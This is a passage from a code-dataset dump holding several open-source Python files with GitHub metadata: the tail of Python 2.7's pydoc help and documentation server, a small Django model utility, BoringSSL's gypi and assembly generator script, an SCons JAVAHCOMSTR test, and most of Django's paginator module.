Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
self.url = 'http://%s:%d/' % (self.address[0], self.server_port)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
def onerror(modname):
pass
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done),
kwargs=dict(onerror=onerror)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
{
"content_hash": "450090b4923653b46ccf7cd000e4176c",
"timestamp": "",
"source": "github",
"line_count": 2408,
"max_line_length": 95,
"avg_line_length": 40.683970099667775,
"alnum_prop": 0.5232578317188441,
"repo_name": "kubaszostak/gdal-dragndrop",
"id": "b62971908a6d6edd5886ec36af7b6540893da364",
"size": "98017",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "osgeo/apps/Python27/Lib/pydoc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "13000"
},
{
"name": "C",
"bytes": "5038286"
},
{
"name": "C#",
"bytes": "14671"
},
{
"name": "C++",
"bytes": "2529439"
},
{
"name": "CMake",
"bytes": "90844"
},
{
"name": "Fortran",
"bytes": "8281"
},
{
"name": "HTML",
"bytes": "1285524"
},
{
"name": "Objective-C",
"bytes": "45668"
},
{
"name": "Python",
"bytes": "16415309"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from model_utils import Choices
__author__ = "pmeier82"
AccessChoices = Choices("private", "public")
if __name__ == "__main__":
pass
|
{
"content_hash": "d76020f0a2bc75ec6f0f6f115936b423",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 44,
"avg_line_length": 20,
"alnum_prop": 0.6611111111111111,
"repo_name": "pmeier82/django-spikeval",
"id": "103e22aa87a1ccfa3fb5a4e2eb4136ffdd7ef3bc",
"size": "205",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djspikeval/models/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "259"
},
{
"name": "HTML",
"bytes": "44877"
},
{
"name": "Python",
"bytes": "81993"
}
],
"symlink_target": ""
}
|
"""Enumerates the BoringSSL source in src/ and generates two gypi files:
boringssl.gypi and boringssl_tests.gypi."""
import os
import subprocess
import sys
# OS_ARCH_COMBOS maps from OS and platform to the OpenSSL assembly "style" for
# that platform and the extension used by asm files.
OS_ARCH_COMBOS = [
('linux', 'arm', 'elf', [''], 'S'),
('linux', 'aarch64', 'linux64', [''], 'S'),
('linux', 'x86', 'elf', ['-fPIC'], 'S'),
('linux', 'x86_64', 'elf', [''], 'S'),
('mac', 'x86', 'macosx', ['-fPIC'], 'S'),
('mac', 'x86_64', 'macosx', [''], 'S'),
('win', 'x86', 'win32n', [''], 'asm'),
('win', 'x86_64', 'nasm', [''], 'asm'),
]
# NON_PERL_FILES enumerates assembly files that are not processed by the
# perlasm system.
NON_PERL_FILES = {
('linux', 'arm'): [
'src/crypto/poly1305/poly1305_arm_asm.S',
'src/crypto/chacha/chacha_vec_arm.S',
'src/crypto/cpu-arm-asm.S',
],
}
FILE_HEADER = """# Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This file is created by update_gypi_and_asm.py. Do not edit manually.
"""
def FindCMakeFiles(directory):
"""Returns list of all CMakeLists.txt files recursively in directory."""
cmakefiles = []
for (path, _, filenames) in os.walk(directory):
for filename in filenames:
if filename == 'CMakeLists.txt':
cmakefiles.append(os.path.join(path, filename))
return cmakefiles
def NoTests(dent, is_dir):
"""Filter function that can be passed to FindCFiles in order to remove test
sources."""
if is_dir:
return dent != 'test'
return 'test.' not in dent and not dent.startswith('example_')
def OnlyTests(dent, is_dir):
"""Filter function that can be passed to FindCFiles in order to remove
non-test sources."""
if is_dir:
return True
return '_test.' in dent or dent.startswith('example_')
def FindCFiles(directory, filter_func):
"""Recurses through directory and returns a list of paths to all the C source
files that pass filter_func."""
cfiles = []
for (path, dirnames, filenames) in os.walk(directory):
for filename in filenames:
if filename.endswith('.c') and filter_func(filename, False):
cfiles.append(os.path.join(path, filename))
continue
for (i, dirname) in enumerate(dirnames):
if not filter_func(dirname, True):
del dirnames[i]
return cfiles
def ExtractPerlAsmFromCMakeFile(cmakefile):
"""Parses the contents of the CMakeLists.txt file passed as an argument and
returns a list of all the perlasm() directives found in the file."""
perlasms = []
with open(cmakefile) as f:
for line in f:
line = line.strip()
if not line.startswith('perlasm('):
continue
if not line.endswith(')'):
raise ValueError('Bad perlasm line in %s' % cmakefile)
# Remove "perlasm(" from start and ")" from end
params = line[8:-1].split()
if len(params) < 2:
raise ValueError('Bad perlasm line in %s' % cmakefile)
perlasms.append({
'extra_args': params[2:],
'input': os.path.join(os.path.dirname(cmakefile), params[1]),
'output': os.path.join(os.path.dirname(cmakefile), params[0]),
})
return perlasms
def ReadPerlAsmOperations():
"""Returns a list of all perlasm() directives found in CMake config files in
src/."""
perlasms = []
cmakefiles = FindCMakeFiles('src')
for cmakefile in cmakefiles:
perlasms.extend(ExtractPerlAsmFromCMakeFile(cmakefile))
return perlasms
def PerlAsm(output_filename, input_filename, perlasm_style, extra_args):
"""Runs the a perlasm script and puts the output into output_filename."""
base_dir = os.path.dirname(output_filename)
if not os.path.isdir(base_dir):
os.makedirs(base_dir)
output = subprocess.check_output(
['perl', input_filename, perlasm_style] + extra_args)
with open(output_filename, 'w+') as out_file:
out_file.write(output)
def ArchForAsmFilename(filename):
"""Returns the architectures that a given asm file should be compiled for
based on substrings in the filename."""
if 'x86_64' in filename or 'avx2' in filename:
return ['x86_64']
elif ('x86' in filename and 'x86_64' not in filename) or '586' in filename:
return ['x86']
elif 'armx' in filename:
return ['arm', 'aarch64']
elif 'armv8' in filename:
return ['aarch64']
elif 'arm' in filename:
return ['arm']
else:
raise ValueError('Unknown arch for asm filename: ' + filename)
def WriteAsmFiles(perlasms):
"""Generates asm files from perlasm directives for each supported OS x
platform combination."""
asmfiles = {}
for osarch in OS_ARCH_COMBOS:
(osname, arch, perlasm_style, extra_args, asm_ext) = osarch
key = (osname, arch)
outDir = '%s-%s' % key
for perlasm in perlasms:
filename = os.path.basename(perlasm['input'])
output = perlasm['output']
if not output.startswith('src'):
raise ValueError('output missing src: %s' % output)
output = os.path.join(outDir, output[4:])
output = output.replace('${ASM_EXT}', asm_ext)
if arch in ArchForAsmFilename(filename):
PerlAsm(output, perlasm['input'], perlasm_style,
perlasm['extra_args'] + extra_args)
asmfiles.setdefault(key, []).append(output)
for (key, non_perl_asm_files) in NON_PERL_FILES.iteritems():
asmfiles.setdefault(key, []).extend(non_perl_asm_files)
return asmfiles
def PrintVariableSection(out, name, files):
out.write(' \'%s\': [\n' % name)
for f in sorted(files):
out.write(' \'%s\',\n' % f)
out.write(' ],\n')
def main():
crypto_c_files = FindCFiles(os.path.join('src', 'crypto'), NoTests)
ssl_c_files = FindCFiles(os.path.join('src', 'ssl'), NoTests)
# Generate err_data.c
with open('err_data.c', 'w+') as err_data:
subprocess.check_call(['go', 'run', 'err_data_generate.go'],
cwd=os.path.join('src', 'crypto', 'err'),
stdout=err_data)
crypto_c_files.append('err_data.c')
with open('boringssl.gypi', 'w+') as gypi:
gypi.write(FILE_HEADER + '{\n \'variables\': {\n')
PrintVariableSection(
gypi, 'boringssl_lib_sources', crypto_c_files + ssl_c_files)
perlasms = ReadPerlAsmOperations()
for ((osname, arch), asm_files) in sorted(
WriteAsmFiles(perlasms).iteritems()):
PrintVariableSection(gypi, 'boringssl_%s_%s_sources' %
(osname, arch), asm_files)
gypi.write(' }\n}\n')
test_c_files = FindCFiles(os.path.join('src', 'crypto'), OnlyTests)
test_c_files += FindCFiles(os.path.join('src', 'ssl'), OnlyTests)
with open('boringssl_tests.gypi', 'w+') as test_gypi:
test_gypi.write(FILE_HEADER + '{\n \'targets\': [\n')
test_names = []
for test in sorted(test_c_files):
test_name = 'boringssl_%s' % os.path.splitext(os.path.basename(test))[0]
test_gypi.write(""" {
'target_name': '%s',
'type': 'executable',
'dependencies': [
'boringssl.gyp:boringssl',
],
'sources': [
'%s',
],
# TODO(davidben): Fix size_t truncations in BoringSSL.
# https://crbug.com/429039
'msvs_disabled_warnings': [ 4267, ],
},\n""" % (test_name, test))
test_names.append(test_name)
test_names.sort()
test_gypi.write(""" ],
'variables': {
'boringssl_test_targets': [\n""")
for test in test_names:
test_gypi.write(""" '%s',\n""" % test)
test_gypi.write(' ],\n }\n}\n')
return 0
if __name__ == '__main__':
sys.exit(main())
|
{
"content_hash": "2122af20a0bf4df284648801b324b7ff",
"timestamp": "",
"source": "github",
"line_count": 253,
"max_line_length": 80,
"avg_line_length": 30.537549407114625,
"alnum_prop": 0.6242557597721978,
"repo_name": "chinmaygarde/mojo",
"id": "18356958fa39b57bdeac15b57c99a55a68b9710e",
"size": "7888",
"binary": false,
"copies": "6",
"ref": "refs/heads/ios",
"path": "third_party/boringssl/update_gypi_and_asm.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1880713"
},
{
"name": "C++",
"bytes": "35838874"
},
{
"name": "Dart",
"bytes": "969667"
},
{
"name": "Go",
"bytes": "186519"
},
{
"name": "Groff",
"bytes": "29030"
},
{
"name": "HTML",
"bytes": "41854"
},
{
"name": "Java",
"bytes": "1274683"
},
{
"name": "JavaScript",
"bytes": "208100"
},
{
"name": "Makefile",
"bytes": "402"
},
{
"name": "Objective-C",
"bytes": "75638"
},
{
"name": "Objective-C++",
"bytes": "408801"
},
{
"name": "Protocol Buffer",
"bytes": "1048"
},
{
"name": "Python",
"bytes": "5645880"
},
{
"name": "Shell",
"bytes": "148167"
},
{
"name": "Yacc",
"bytes": "31141"
},
{
"name": "nesC",
"bytes": "18347"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that the $JAVAHCOMSTR construction variable allows you to configure
the javah output.
"""
import os.path
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.subdir('src')
out_file1_h = os.path.join('out', 'file1.h')
out_file2_h = os.path.join('out', 'file2.h')
out_file3_h = os.path.join('out', 'file3.h')
test.write('myjavah.py', r"""
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in filter(lambda l: l != '/*javah*/\n', infile.readlines()):
outfile.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(TOOLS = ['default', 'javah'],
JAVAHCOM = r'%(_python_)s myjavah.py $TARGET $SOURCES',
JAVAHCOMSTR = 'Building javah $TARGET from $SOURCES')
env.JavaH(target = 'out', source = 'file1.class')
env.JavaH(target = 'out', source = 'file2.class')
env.JavaH(target = 'out', source = 'file3.class')
""" % locals())
test.write('file1.class', "file1.class\n/*javah*/\n")
test.write('file2.class', "file2.class\n/*javah*/\n")
test.write('file3.class', "file3.class\n/*javah*/\n")
test.run(stdout = test.wrap_stdout("""\
Building javah %(out_file1_h)s from file1.class
Building javah %(out_file2_h)s from file2.class
Building javah %(out_file3_h)s from file3.class
""" % locals()))
test.must_match(['out', 'file1.h'], "file1.class\n")
test.must_match(['out', 'file2.h'], "file2.class\n")
test.must_match(['out', 'file3.h'], "file3.class\n")
test.pass_test()
|
{
"content_hash": "e180670c48e808cf23ae487789b5b021",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 73,
"avg_line_length": 31.68235294117647,
"alnum_prop": 0.6910508726327516,
"repo_name": "datalogics-robb/scons",
"id": "8ee57670b40fb0229c821bb2209c2b56270fdc4b",
"size": "2693",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/Java/JAVAHCOMSTR.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "43855"
},
{
"name": "Perl",
"bytes": "23384"
},
{
"name": "Python",
"bytes": "4753658"
},
{
"name": "Shell",
"bytes": "25935"
}
],
"symlink_target": ""
}
|
import collections
import warnings
from math import ceil
from django.utils.functional import cached_property
from django.utils.translation import gettext_lazy as _
class UnorderedObjectListWarning(RuntimeWarning):
pass
class InvalidPage(Exception):
pass
class PageNotAnInteger(InvalidPage):
pass
class EmptyPage(InvalidPage):
pass
class Paginator:
def __init__(self, object_list, per_page, orphans=0,
allow_empty_first_page=True):
self.object_list = object_list
self._check_object_list_is_ordered()
self.per_page = int(per_page)
self.orphans = int(orphans)
self.allow_empty_first_page = allow_empty_first_page
def validate_number(self, number):
"""Validate the given 1-based page number."""
try:
number = int(number)
except (TypeError, ValueError):
raise PageNotAnInteger(_('That page number is not an integer'))
if number < 1:
raise EmptyPage(_('That page number is less than 1'))
if number > self.num_pages:
if number == 1 and self.allow_empty_first_page:
pass
else:
raise EmptyPage(_('That page contains no results'))
return number
def get_page(self, number):
"""
Return a valid page, even if the page argument isn't a number or isn't
in range.
"""
try:
number = self.validate_number(number)
except PageNotAnInteger:
number = 1
except EmptyPage:
number = self.num_pages
return self.page(number)
def page(self, number):
"""Return a Page object for the given 1-based page number."""
number = self.validate_number(number)
bottom = (number - 1) * self.per_page
top = bottom + self.per_page
if top + self.orphans >= self.count:
top = self.count
return self._get_page(self.object_list[bottom:top], number, self)
def _get_page(self, *args, **kwargs):
"""
Return an instance of a single page.
This hook can be used by subclasses to use an alternative to the
standard :cls:`Page` object.
"""
return Page(*args, **kwargs)
@cached_property
def count(self):
"""Return the total number of objects, across all pages."""
try:
return self.object_list.count()
except (AttributeError, TypeError):
# AttributeError if object_list has no count() method.
# TypeError if object_list.count() requires arguments
# (i.e. is of type list).
return len(self.object_list)
@cached_property
def num_pages(self):
"""Return the total number of pages."""
if self.count == 0 and not self.allow_empty_first_page:
return 0
hits = max(1, self.count - self.orphans)
return int(ceil(hits / float(self.per_page)))
@property
def page_range(self):
"""
Return a 1-based range of pages for iterating through within
a template for loop.
"""
return range(1, self.num_pages + 1)
def _check_object_list_is_ordered(self):
"""
Warn if self.object_list is unordered (typically a QuerySet).
"""
ordered = getattr(self.object_list, 'ordered', None)
if ordered is not None and not ordered:
obj_list_repr = (
'{} {}'.format(self.object_list.model, self.object_list.__class__.__name__)
if hasattr(self.object_list, 'model')
else '{!r}'.format(self.object_list)
)
warnings.warn(
'Pagination may yield inconsistent results with an unordered '
'object_list: {}.'.format(obj_list_repr),
UnorderedObjectListWarning,
stacklevel=3
)
QuerySetPaginator = Paginator # For backwards-compatibility.
class Page(collections.Sequence):
def __init__(self, object_list, number, paginator):
self.object_list = object_list
self.number = number
self.paginator = paginator
def __repr__(self):
return '<Page %s of %s>' % (self.number, self.paginator.num_pages)
def __len__(self):
return len(self.object_list)
def __getitem__(self, index):
if not isinstance(index, (int, slice)):
raise TypeError
# The object_list is converted to a list so that if it was a QuerySet
# it won't be a database hit per __getitem__.
if not isinstance(self.object_list, list):
self.object_list = list(self.object_list)
return self.object_list[index]
def has_next(self):
return self.number < self.paginator.num_pages
def has_previous(self):
return self.number > 1
def has_other_pages(self):
return self.has_previous() or self.has_next()
def next_page_number(self):
return self.paginator.validate_number(self.number + 1)
def previous_page_number(self):
return self.paginator.validate_number(self.number - 1)
def start_index(self):
"""
Return the 1-based index of the first object on this page,
relative to total objects in the paginator.
"""
# Special case, return zero if no items.
if self.paginator.count == 0:
return 0
return (self.paginator.per_page * (self.number - 1)) + 1
def end_index(self):
"""
Return the 1-based index of the last object on this page,
relative to total objects found (hits).
"""
# Special case for the last page because there can be orphans.
if self.number == self.paginator.num_pages:
return self.paginator.count
